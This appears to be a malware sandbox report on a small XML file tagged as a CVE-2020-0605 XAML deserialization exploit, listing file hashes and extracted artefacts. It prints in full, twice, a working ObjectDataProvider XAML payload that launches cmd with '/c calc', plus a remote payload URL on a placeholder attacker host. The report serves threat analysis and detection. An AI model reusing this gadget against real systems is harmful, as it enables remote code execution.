Malicious
Malicious

xdfa65.xml

XML
|
MD5: 4bd09f2dc67e59f1c23938ba3e342a6f
|
Size: 832 B
|
text/xml

Remote XAML Injection
CVE-2020-0605
XAML Deserialization Exploit
ObjectDataProvider XAML
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
4bd09f2dc67e59f1c23938ba3e342a6f
Sha1
ca357880977bafc3b3d59d41d749cce33970821d
Sha256
9c9fef1a647d1135a662baa47f09fccce751a37a55b0907983c4944704cbcd36
Sha384
5e9a86b0658890d190cd784b776a9a87ac638fe488ce0447507ba18f7a59af900e08aeebedac58bcfcaf579fbb2ec37c
Sha512
1e49f8f5875de8fb4d3f4a41670bf75c06167ddfa0c57a1b8242887d9bd26e7819b618fa38498cc8f805bc3ff8bad7141247f04736ac309b86c6f763fa1364fa
SSDeep
24:yr4+4hSP+y/3oCWXWpWFbnWqnWr3o0w4+Qs3:U+dy/3SG41WqWr3v2QO
TLSH
2E01BDE9469E6C10D8F999437AF0E407EC420147A6CAF294B4DC834F6F2D980A007AF3
File Structure
xdfa65.xml
Remote XAML Injection
CVE-2020-0605
XAML Deserialization Exploit
ObjectDataProvider XAML
Malicious
Malware Configuration - XAML RCE Payload
Config. Field
 Value
Command

cmd
Arguments

/c calc
Artefacts
Name
 Value
Remote XAML Reference

http://[attackersite]/payload.xaml
XAML Embedded ObjectDataProvider

<ObjectDataProvider MethodName="Start" x:Key="" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"><ObjectDataProvider.ObjectInstance><sd:Process xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="/c calc" FileName="cmd" /></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider>
xdfa65.xml (832 B)
File Structure
xdfa65.xml
Remote XAML Injection
CVE-2020-0605
XAML Deserialization Exploit
ObjectDataProvider XAML
Malicious
Characteristics
Malware Configuration - XAML RCE Payload
Config. Field
 Value
Command

cmd
Arguments

/c calc
Artefacts
Name
 Value Location
Remote XAML Reference

http://[attackersite]/payload.xaml

Malicious

xdfa65.xml
XAML Embedded ObjectDataProvider

<ObjectDataProvider MethodName="Start" x:Key="" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"><ObjectDataProvider.ObjectInstance><sd:Process xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="/c calc" FileName="cmd" /></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider>

Malicious

xdfa65.xml
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙